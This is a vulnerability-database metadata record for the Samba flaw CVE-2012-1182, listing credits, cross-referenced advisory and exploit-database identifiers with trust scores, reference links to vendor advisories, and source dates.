sources: PACKETSTORM: 116953 // EXPLOIT-DB: 21850

CREDITS

Metasploit

Trust: 0.6

sources: EXPLOIT-DB: 21850

EXTERNAL IDS

db:ZDIid:ZDI-12-069

Trust: 2.4

db:NVDid:CVE-2012-1182

Trust: 2.4

db:EXPLOIT-DBid:21850

Trust: 1.6

db:EDBNETid:56870

Trust: 0.6

db:PACKETSTORMid:116953

Trust: 0.5

db:ZDIid:ZDI-12-068

Trust: 0.3

db:ZDIid:ZDI-12-063

Trust: 0.3

db:ZDIid:ZDI-12-071

Trust: 0.3

db:ZDIid:ZDI-12-061

Trust: 0.3

db:ZDIid:ZDI-12-070

Trust: 0.3

db:ZDIid:ZDI-12-064

Trust: 0.3

db:ZDIid:ZDI-12-072

Trust: 0.3

db:BIDid:52973

Trust: 0.3

sources: BID: 52973 // PACKETSTORM: 116953 // EXPLOIT-DB: 21850 // EDBNET: 56870

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2012-1182

Trust: 2.1

url:http://www.zerodayinitiative.com/advisories/zdi-12-069/

Trust: 1.0

url:https://www.exploit-db.com/exploits/21850/

Trust: 0.6

url:http://www.collax.com/produkte/die-komplettloesung-fuer-kleine-unternehmen

Trust: 0.3

url:http://www.samba.org

Trust: 0.3

url:http://www.zerodayinitiative.com/advisories/zdi-12-069

Trust: 0.3

url:http://www.itrc.hp.com/service/cki/docdisplay.do?docid=emr_na-c03366886

Trust: 0.3

url:http://www.zerodayinitiative.com/advisories/zdi-12-061

Trust: 0.3

url:http://www.zerodayinitiative.com/advisories/zdi-12-072

Trust: 0.3

url:http://h20565.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_na-c03365218&ac.admitted=1339650390917.876444892.492883150

Trust: 0.3

url:http://www.zerodayinitiative.com/advisories/zdi-12-071

Trust: 0.3

url:https://downloads.avaya.com/css/p8/documents/100161830

Trust: 0.3

url:http://www.samba.org/samba/security/cve-2012-1182

Trust: 0.3

url:https://downloads.avaya.com/css/p8/documents/100161399

Trust: 0.3

url:https://blogs.oracle.com/sunsecurity/entry/cve_2012_1182_arbitrary_code

Trust: 0.3

url:http://www.zerodayinitiative.com/advisories/zdi-12-063

Trust: 0.3

url:http://www.samba.org/samba/history/samba-3.6.4.html

Trust: 0.3

url:http://www.zerodayinitiative.com/advisories/zdi-12-068

Trust: 0.3

url:http://www-304.ibm.com/support/docview.wss?uid=ssg1s1004108

Trust: 0.3

url:https://access.redhat.com/security/cve/cve-2012-1182

Trust: 0.3

url:http://www.blackberry.com/btsc/kb32189

Trust: 0.3

url:http://www.zerodayinitiative.com/advisories/zdi-12-070

Trust: 0.3

url:http://www.zerodayinitiative.com/advisories/zdi-12-064

Trust: 0.3

url:http://www-304.ibm.com/support/docview.wss?uid=ssg1s1004109

Trust: 0.3

sources: BID: 52973 // PACKETSTORM: 116953 // EXPLOIT-DB: 21850 // EDBNET: 56870

SOURCES

db:BIDid:52973
db:PACKETSTORMid:116953
db:EXPLOIT-DBid:21850
db:EDBNETid:56870

LAST UPDATE DATE

2022-07-27T09:15:57.092000+00:00


SOURCES UPDATE DATE

db:BIDid:52973date:2015-04-13T21:38:00

SOURCES RELEASE DATE

db:BIDid:52973date:2012-04-10T00:00:00
db:PACKETSTORMid:116953date:2012-09-28T00:14:27
db:EXPLOIT-DBid:21850date:2012-10-10T00:00:00
db:EDBNETid:56870date:2012-10-10T00:00:00